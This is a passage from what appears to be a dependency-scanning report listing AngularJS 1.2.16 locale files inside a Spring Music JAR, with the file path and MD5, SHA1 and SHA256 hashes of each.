spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-nz.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-nz.js
MD5: 5911465f1cd18b7dcacb3db5177614d0
SHA1: 39c858315e1105473e86ed013d99b2c8a3c8141f
SHA256: 24e8276ab79fc7bddcd32c8c97b6d45f0eaf98aca1acb68586dc83f685cafdba
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-ph.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-ph.js
MD5: 3e696542084731465800ba8727938755
SHA1: a4812db4fb080cfac3cd6e9b7474249e6774800b
SHA256: e85388448447ed28ed98e6f2dd50251d74f3c9cd1ebb9e1fe0d409e7adc5e83b
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-pk.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-pk.js
MD5: f59b73693a6f4a835bb5872d66d34a95
SHA1: 674f817f7906ad6371145061f2f32d8500f2975f
SHA256: 106cdbaa6552f81965ee6aadc8e4d0663fe3fd18e5a35afff8d5b47398a4e791
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-pr.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-pr.js
MD5: 6d60893826710934e6135147c3d422fc
SHA1: 5816175c3e619b7376091843af776b8948e08a41
SHA256: 825bd81a92ae2d5060c42a1f87330a53006841f26858a2d955b8c7bdff83f664
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-pw.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-pw.js
MD5: 9cbcc24cbfd74cf3a615d51785b10a73
SHA1: 566470335d37fb6953ace38fe1a40c7a247291ba
SHA256: ac8ba315c51412c95fe7f5bde1640b41580587f1641a36fbca2db0e07763da8a
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-sg.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-sg.js
MD5: 46133dd09f4ae82ec71ad4d19918ab37
SHA1: acca539dd5f6fe2188dc599f76ec14b215ed92b4
SHA256: 9bc6196b4628c218ae9e7b167f510e5c7fd19bb97debad8c334ce5a787092c67
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-tc.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-tc.js
MD5: 137388e786886100b831e98be115f994
SHA1: d763c6dfa9a9bc70042a9db61aa12544759f2b28
SHA256: 1d45d5b24ecbe90d4137fbf62347eaea22cea1d2a638acc8115007160d22fb96
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-tt.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-tt.js
MD5: c020c852340c814b4c5a7aa5375ea9d3
SHA1: e33d75cdc5831ec82cb937955cac13a9a32b5ba8
SHA256: 4c26ac60aa0695985554451201021fe3d75783e04272c83dabda1a15b8b9abc0
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-um.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-um.js
MD5: 6d0bb60d5ec663f897abf15ef5b6ba08
SHA1: 80aef25d64a57b8e7f47db954eb4695a0d3a5c04
SHA256: 0966384007729b76ae1ec61ccb039c33294bcefdf1403c18687379b60425d7a2
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-us.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-us.js
MD5: 40959785e2ddac2956e6c5a2efd9c6be
SHA1: 1fc78655ea8516ec5f9bb8d5ef18b09b1eddfaa0
SHA256: de119499a7466aa627fe79bb1568082843747ad25e79c9814521c5117091e3c5
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-vg.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-vg.js
MD5: f6ec14bd4d1d9fe668c7f1153f772fd3
SHA1: 41ba85592d069e544ceab29a87a20a2dc7f5c6b9
SHA256: 7cd70d909ebd4e0ddad9d940bd3242f7aa8b148b842f178adbc9d0951697f30b
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-vi.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-vi.js
MD5: 1cad652eaca2d1226fda562be41cbdaa
SHA1: d495dc75edeb06b3142e10213a0fe92883752483
SHA256: 7120e5bdfa4b5d11a40c47fd04f88f2d0cb73919d4464b75321483d0a4ccad2c
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-za.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-za.js
MD5: e10f8840635b50da81ca71b88e9a09d6
SHA1: 3b3643485db446e4d56488f633fb6960866c1739
SHA256: 5658111f304a4efc95fda0ee88a8f068317d5ad68d305a08ca1c475dadad7a53
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-zw.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-zw.js
MD5: aa6384e7296dfea51d33511c301904f9
SHA1: ad34b7837067f6ced580177e58ebbe7ebd6cdcae
SHA256: dde6100a49704a9f5d2dbb4fb7b412a09a0283447fb2f25c257d961867f352e1
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en.js
MD5: df6fce84d373c1e539ef1f3cc08ec0d1
SHA1: e67963582996097fdea1ed2e85785d7a5f92b86f
SHA256: 1f8c92716b9b9a7998ec913fabf8f99eb73f483900cba28b89abe073771e8bb8
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-419.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-419.js
MD5: c3dcc66d0575931380333e2643a46efd
SHA1: 8c3f3d5b64dcd12a3d6b3851969a4d7cfd06caa4
SHA256: db121135623fd01a0d4087ac303f0e7c2f8b4d71a15bc28cb08bb6bac86c79ec
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ar.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ar.js
MD5: d5801b41cecfb4af0636a2c10deab608
SHA1: db764e7ae6eb98a0452ea6394b5395d7b3dbc5e7
SHA256: 5147e6636984e028050fcef7bf5b979da46ce77b3252f21c48a46697bedec85a
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-bo.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-bo.js
MD5: e4547d89cecbc912427acdd30e142b00
SHA1: d91ac80324db37283f7e821fdacf550d34a727f4
SHA256: b348e84780cd263ed42e3eed7b01e7ad0bf7fbbde4f38f89ffaa77b97d4c82b5
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-cl.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-cl.js
MD5: f3597d311953675e6afcb417753fc651
SHA1: cacb03a818b443af59b5f6fd95560dfa3ba0c1a9
SHA256: 6a0ec67524f39d6032c106297d701b9185221903a65b7a7342b4a89c5ff4b9d0
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-co.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-co.js
MD5: 152b3b4982f4ee6e28d9abdd51e61fcd
SHA1: 5522355792b41155f9a03e0b49cfd12dcde6592f
SHA256: 001262fa01caa953655a6d2f86f0fbcb3e0ce545837c8e5781ce8c5dafd9e4c9
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-cr.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-cr.js
MD5: 61145cb67e0cf78495acbbf1fc3c66d2
SHA1: 411c1531e150c7ff8fe181a870e48aac29e5c583
SHA256: 19cdf4de3349d99250442b63b89d872eee2280b61e5cf339a0c76a4a842edc7c
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-do.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-do.js
MD5: 62a59b6bfaa2a11446081d45a090e8d4
SHA1: c017a4afba708584c8280fac8bf954518f911f06
SHA256: 979a70922762637ec262c40bef213aafc9e6129bc69390626101ef99a33600cc
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ea.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ea.js
MD5: 8085210a1fd3e82a7eed841525f5e790
SHA1: 464ccba22204517250f5c5ffaa6e1a43826bdd53
SHA256: dc20f0579509adff218a76b786b3a8143b9b049a89eeb7923e9d97659525362d
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ec.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ec.js
MD5: 5632f0491339142aaf4a7f681fdeeeb4
SHA1: fcb7ff849a4f915d8146d7fd62fb7ba7574c9a56
SHA256: 13c417604e631240c33976ecde4de75526ac79b8dea177bef1e517b47a4903d8
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-es.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-es.js
MD5: 052b3894b22399d64a048a786afd9ba8
SHA1: b1713f22b257eb7f47e03388069206cae5c65541
SHA256: a6914f29417fd00ddb99d5459515e101d7045d25b34ac255cb959968889abdbf
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-gq.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-gq.js
MD5: be2c2108c86eab7d6a73444503e17835
SHA1: 86c22283052011ccec757422741bfdfc60f076aa
SHA256: 897f1ce4a2db227c00e04ba192b69a9c609c62ddfe05a62acf6517ea5df43045
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-gt.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-gt.js
MD5: 855a32a559e3ed68914fa6d7e40c5121
SHA1: cb395e59534ad90320d3e3788bb294eb92640061
SHA256: f1f7d4cc2fbc3b12b483017e37047680a901a85a0394236eaa3edbd315499eca
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-hn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-hn.jsMD5: 1ef359216b3591ec94b84114c5313beeSHA1: 6eeb3795f1b5c57e53fddfcbf7903dbc01b69d6bSHA256: be4f825284484e29b6513016a3df00c19a30f855d0c813037a13b71b99d282fa
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ic.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ic.jsMD5: 737dc27638c150006d35cec479de1471SHA1: 32bb529dec19b6a51224f1fb0d94f72b07e8a422SHA256: f8ecf73e78a4dd2b0717b0c33186726365a9664566835085aa1d08eafc0afcf7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-mx.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-mx.jsMD5: e0ba9c887e69c12c78dfbc4028cdd365SHA1: ffd6d822ed3360c93d253844c5434dd4444a1f50SHA256: 514640b489606e420c1a51abb73e16891397254786c2d2bdb85b499fbfa45e88
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ni.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ni.jsMD5: 4ad641bcfd11a4dbe2f0a97c3d43306cSHA1: deec07091ac72346b5f9442934c166485587e2dbSHA256: 3cf5fa668341cc91024883db32fb6a44773338f4ee7911960968e05366b1b5ad
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-pa.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-pa.jsMD5: c16a8c3f0e67d2f14bc8b8d2b252b4fbSHA1: 2e62dd921101c71dd5ad789ffcc7246fee39f21eSHA256: b908ec0a0bce1b7c91a8eb8b17e4d908ea1b40b8b9ea15b5d127554d6ea5b334
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-pe.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-pe.jsMD5: 2969d9c11a1921e5a82d47e75db342d6SHA1: 828aff68c4b56eada62741ffeacb1db455692098SHA256: 46b20ce6a9faa5b2f0a61886e9df6ca203cf021d2783f79037c9d07242eda968
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-pr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-pr.jsMD5: 2088728a280fa9be45209639bbfc56deSHA1: 394b30b14c1a031185808ce0a76aa293ea398436SHA256: c909a467a205e68288d25a1c1d75313318413f614d9c8b1c7e4eaad6a2605ae4
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-py.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-py.jsMD5: 7922d3fe23df4ab9dcea868567ef47ceSHA1: 305696960a55bef504e829208216db90a9b8088dSHA256: 416660781d50ed7a2f8963cbbb19400e40eb6a8269200dc795e61f85d1e5a8fa
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-sv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-sv.jsMD5: e20105ff10a0e519ef84515d11368970SHA1: f495fa3f8e190bf3fbfb95c5b8307843c4452581SHA256: a47a8c250314704f5d08ba643b5ba307400f8a4c3743ba6285f079699c87f0a8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-us.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-us.jsMD5: 3a8cb7700af81aa8d303bff55cb151d1SHA1: 56c15677a4ff978a1c9fa4c45da7bf88e8d71560SHA256: 60be8483bda3b225c454c832f54d34112dd0f2ad079d7a013818154c5cb98fef
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-uy.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-uy.jsMD5: 38ecf120ffc1519648199c00538fa609SHA1: ffb4d2b8b94a02159310a39940a5936128f49904SHA256: 20144c3aa8748387595512443fe2361db3973c27bb9470128ebfa565b872f363
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ve.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ve.jsMD5: 66da69e7f833a8658db9e8be78bc08c5SHA1: 84100e53fd55796988d3ba0188a1ce111bc532c7SHA256: d3000fe744ff95e2e9ed6a60bca15e1421e1031414f7217d908b69e9295c87fc
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es.jsMD5: c89bf8d1dc408d95e985094f07ded6c7SHA1: cddca3b6a23d0dbb20d0741ebc88b83043ccbfd5SHA256: e435a3e0d6ea206c03e7a842915304ea649e1c50a44a905f2f8a40b6b429e83b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_et-ee.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_et-ee.js
MD5: 8141fdd626dac0eb8237b5770fcacdf8
SHA1: 36c21d7ed72ee7af900b78eee414ef267a55795d
SHA256: 3b5a750e04ec4d8705efaa526917be5643825a8ea4888ba63b99f2bde8c2fa92

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_et.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_et.js
MD5: 4cb455f2ff2a08c95c99912b2d764d11
SHA1: 635b7d38d0e8e795a0c2912346d5bf2be446df51
SHA256: 90241eb442c709b20d749c6ac3d140720c81f085f8788352c8939a0d9fca77c3

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_eu-es.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_eu-es.js
MD5: b7e002b81810dbd4501c39801b4aea75
SHA1: 2ea61d79eb4d34c923cef179bea95ec59955e00c
SHA256: ea667bfce65fd20080292f47a9a882f74c3fbfeb771f079bafcb259188cec8a2

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_eu.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_eu.js
MD5: e2af9ee595d50c8bc3d3da1661883a8d
SHA1: ab5c5e784518339fa284f349c660f178bc480efa
SHA256: be422e2cff17c3f239577fecd6b9c61f61590f76af95808c546af724ba9c0f90

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fa-af.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fa-af.js
MD5: 900232a857e5ccae5a8ba66f078338f3
SHA1: 976c3f18df486f9dea083e903ed805643c715159
SHA256: d7222e46c59a271bf33cee2a82e285b6134e70a6bc627257bf89269732161a33

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fa-ir.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fa-ir.js
MD5: 605626627b58200cffdf962d48487693
SHA1: 91b41e754d5e012a6fcd55994835f3a8228aecb8
SHA256: b1ea413529fed167de879f62a39d866373507f9ad5804faf08a16f12830e2a80

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fa.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fa.js
MD5: b28c6e37e5c0c23e59dc426eedb3bbb1
SHA1: b0aa3625c9b8e319f1b9ed2867637078ad3c5f04
SHA256: 3c36d6b30b63f10f8e5c861f20709711ba1651d0055c05cb9132ba78b87905c1

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fi-fi.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fi-fi.js
MD5: a4f7b5c02a4890c5d460e1353d2a994b
SHA1: 100be9bab6340c3249e35939828c4c33eed69305
SHA256: d15be6c4d52831d7f4c20b8f2b461332215072284affcf3ca299ddc2bb812ab0

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fi.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fi.js
MD5: df81ead8e990d70158cbf5e8bf497fe3
SHA1: c67f0bff58c544634262d27e4308ce08160c94a4
SHA256: 541b0fab7d7873e985ccdd5495f94909e6fdd828dc17e2ff1ae9a56085b07212

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fil-ph.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fil-ph.js
MD5: 8082c3bfea8464c446fb7a5f6d4e46ce
SHA1: 2aa50266d61eea45b974bbf2fd3583a8748a89e0
SHA256: dd9c17accdfacd776151cef90fcca884acaeb9080ee524e4f5b6e50bd4a1f0fb

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fil.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fil.js
MD5: 253e9849f229287473c02bbcc7702b28
SHA1: ca5d504ce6a15379dba14903bc07d0f52646bfe1
SHA256: b76b94481e58e2128fb22b243d6bce294868eb074bfd34cf90a78f21dbfc3d4f

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-be.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-be.js
MD5: 8c39aa506dd3bc16bb3553bfe8ee8796
SHA1: 68451f142b82c0c92cdade8a1ac36e18e99b528a
SHA256: dd5030b015cbb8a8c1590d3fab5a5a18df4bb788b599eda55c5483c691dbfb88

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-bf.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-bf.js
MD5: 48230bdbe0e65ad0b6cba19ac9f22e47
SHA1: 50cc5967d74b2ed0dd523a29922601cb125468f4
SHA256: 08786b70e990a71a3116ece19733c256a9c44e7df7cf2e722aa3e69d77e7a37f

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-bi.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-bi.js
MD5: 5b0baf8b323d57f2571e1cdca0dfe786
SHA1: 94fdae4dce2a264a704fd0e87d6ab682c4c8de48
SHA256: 96644c11d620f7df146337877f1a43fb8b18d639573ac76267bc009fc9c683af

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-bj.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-bj.js
MD5: 4bbaf07de5345d4772388d4cce2a4b8c
SHA1: cd68b139086aa3ccf6a1cadc3f94b4b11b882e39
SHA256: d4f91f5af125108515a92510c3becac369fcbf553673bea1819c4463a079f878

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-bl.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-bl.js
MD5: 4aa8cd86fe773ef39c73c11575bade55
SHA1: ec5dc3fbbf731b7c4d12265d3b301adc856bc1a8
SHA256: a0b9ea9d906aa0f58514a321f9da01c06ba2d5b6283d875de7e41735be24478c

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ca.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ca.js
MD5: a5c88d42d000ea1973dba4766f1a30ab
SHA1: 7232499350db9ca0732c027083a22bd164c018fc
SHA256: bb789cd5aa49662acaab227824a6856894bc55817a97767420373afa78d7d03f

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-cd.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-cd.js
MD5: 5acf9047471a9563382c7324ffca8af2
SHA1: 4cc27fd815a25f6df624a8c06c5e0873f759e25c
SHA256: 35be9df6783cda8d83f0e307cc5f4605fae6278f04005b40de31accc1c060fcf

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-cf.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-cf.js
MD5: 4bcab995234f08449c4e70019783f970
SHA1: 672c971d87937dd0a627d8307c0cbbb3230c3697
SHA256: ff1bbfa672e9b7e47b8f0ae2c6a5a9c2a24b38b4077083409d0cf971cd66cbb4

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-cg.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-cg.js
